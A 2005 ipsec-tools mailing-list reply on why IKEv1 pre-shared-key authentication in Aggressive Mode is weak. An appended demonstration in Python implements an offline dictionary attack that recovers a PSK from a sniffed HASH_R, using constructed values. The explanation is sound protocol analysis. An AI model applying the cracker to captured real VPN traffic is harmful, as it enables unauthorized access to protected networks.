Re: [Ipsec-tools-devel] does the racoon match the draft"IKEv2"?
From: VANHULLEBUS Y. <va...@fr...> - 2005-09-02 15:58:44
On Fri, Sep 02, 2005 at 09:55:08AM -0400, uri...@op... wrote:
> > > > Some IKE configurations are known to be poor on security. This
> > > > is a protocol problem, not an implementation problem. Generally
> > > > speaking, PSK is bad.
> > > > PSK with aggressive mode is even worse.
> >
> > Is there any other security problem? I want to know it! I'm not
> > sure where I can find the discussion about the topic.
>
> Can Yvan please elaborate? To the best of my knowledge, PSK is
> quite OK, especially from the protocol point of view, and the only
> issue with Aggressive mode is that it does not hide identities of
> the peers.

PSK / Aggressive mode is quite weak. It has been discussed here; the
problems are:

- Guessing valid identities, because the responder will only reply if
  the initiator sends a valid ID. This can be solved by some mechanism
  which would detect too many attempts from the same peer and blacklist
  it, but it could lead to some easy DoS!

- Cracking a PSK, because in aggressive mode the responder will be the
  first to send cryptographic payloads. See
  http://ikecrack.sourceforge.net/ for more information. This is a flaw
  in the protocol, and cannot be fixed afaik. I didn't have time for now
  to test that tool and check how much time it needs to crack a PSK.

Those two problems are really specific to PSK / Aggressive mode. I don't
know any problems with Certificates / Aggressive mode or PSK / Main mode,
and I don't think such problems could exist with those configurations.

> Also, a few points. Since when is repudiation a concern when you're
> trying to establish a secure pipe between two peers? How often do
> you think PSK should be regenerated, considering that it is ONLY
> used to authenticate the SA establishment exchanges?

It depends on lots of things:

- Size and complexity of the PSK
- phase1 lifetime (in fact, the number of phase1s which can be sniffed
  during some amount of time).
- DH group and encryption algorithms used.

All those parameters will determine how much time will be needed to do
some offline brute force attack / statistical cryptanalysis.

I don't think such a brute force attack can be done with MAIN mode, as
HASH_I and HASH_R are encrypted (5th and 6th exchanges of the phase1).

Bruteforcing MAIN mode would need "some kind of DH bruteforce" (well,
I'm not a DH expert, I'm still not sure this means something, but if
this means something, I'm quite sure this can't be done in a
"reasonable amount of time").

Yvan.

--
NETASQ - Secure Internet Connectivity
http://www.netasq.com
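The offline PSK attack Yvan refers to, as an added example that is not part of the original thread, of ipsec-tools, or of IKECrack. It follows the RFC 2409 definitions for pre-shared-key authentication: SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b). In Aggressive Mode the responder sends HASH_R in its second message, unencrypted, and every other input to that hash has already crossed the wire in the clear, so a passive sniffer can recompute HASH_R for each candidate PSK and compare. The prf (HMAC-SHA1), the captured field values and the wordlist below are all constructed for the demonstration and are not from any real exchange.

```python
"""Offline PSK guessing against a sniffed IKEv1 Aggressive Mode exchange (RFC 2409)."""
import hashlib
import hmac
from typing import Optional

# Negotiated prf assumed to be HMAC-SHA1 for this example (assumption; the
# attack is the same for any other prf).
PRF = hashlib.sha1


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """RFC 2409 5.4, pre-shared key authentication: SKEYID = prf(PSK, Ni_b | Nr_b)."""
    return hmac.new(psk, ni_b + nr_b, PRF).digest()


def hash_r(skeyid: bytes, gxr: bytes, gxi: bytes, cky_r: bytes, cky_i: bytes,
           sai_b: bytes, idir_b: bytes) -> bytes:
    """RFC 2409 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return hmac.new(skeyid, gxr + gxi + cky_r + cky_i + sai_b + idir_b, PRF).digest()


# Constructed "capture" of Aggressive Mode messages 1 and 2. All of these
# fields travel in the clear; none of the values below is real.
CAPTURE = {
    "cky_i": bytes.fromhex("0123456789abcdef"),        # initiator cookie
    "cky_r": bytes.fromhex("fedcba9876543210"),        # responder cookie
    "sai_b": b"constructed SA payload body (proposal/transform bytes)",
    # DH public values; stand-ins for g^xi and g^xr, NOT real group elements.
    "gxi": hashlib.sha256(b"constructed initiator DH public value").digest(),
    "gxr": hashlib.sha256(b"constructed responder DH public value").digest(),
    "ni_b": bytes.fromhex("11" * 16),                  # initiator nonce body
    "nr_b": bytes.fromhex("22" * 16),                  # responder nonce body
    # ID payload body: type 2 = ID_FQDN, protocol 0, port 0, then the name.
    "idir_b": bytes([2, 0, 0, 0]) + b"vpn.example.invalid",
}

# Constructed wordlist for the dictionary attack.
WORDLIST = [b"password", b"letmein", b"cisco123", b"hunter2", b"Secret!2005"]


def responder_hash_r(psk: bytes) -> bytes:
    """What the responder puts in Aggressive Mode message 2, for a given PSK."""
    sk = skeyid_psk(psk, CAPTURE["ni_b"], CAPTURE["nr_b"])
    return hash_r(sk, CAPTURE["gxr"], CAPTURE["gxi"], CAPTURE["cky_r"],
                  CAPTURE["cky_i"], CAPTURE["sai_b"], CAPTURE["idir_b"])


def crack_psk(captured_hash_r: bytes, wordlist) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R per candidate and compare.

    Nothing here needs the DH private exponents or SKEYID_e, which is exactly
    why Aggressive Mode + PSK is guessable offline.
    """
    for cand in wordlist:
        if hmac.compare_digest(responder_hash_r(cand), captured_hash_r):
            return cand
    return None


def main() -> None:
    # The responder's real PSK is weak and happens to be in the wordlist.
    on_the_wire = responder_hash_r(b"cisco123")
    print("HASH_R seen in message 2:", on_the_wire.hex())
    print("recovered PSK:", crack_psk(on_the_wire, WORDLIST))


if __name__ == "__main__":
    main()
```

The contrast with Main Mode is the point of the last paragraph above: there HASH_I and HASH_R are carried in messages 5 and 6 under the phase 1 encryption key, which is derived from g^xy, so the sniffer has nothing in the clear to compare a per-guess HASH_R against without first solving the Diffie-Hellman exchange. Note also that the cracker above only works once the attacker has observed a responder reply at all, which is where the first problem (the responder answering only a valid ID) comes in.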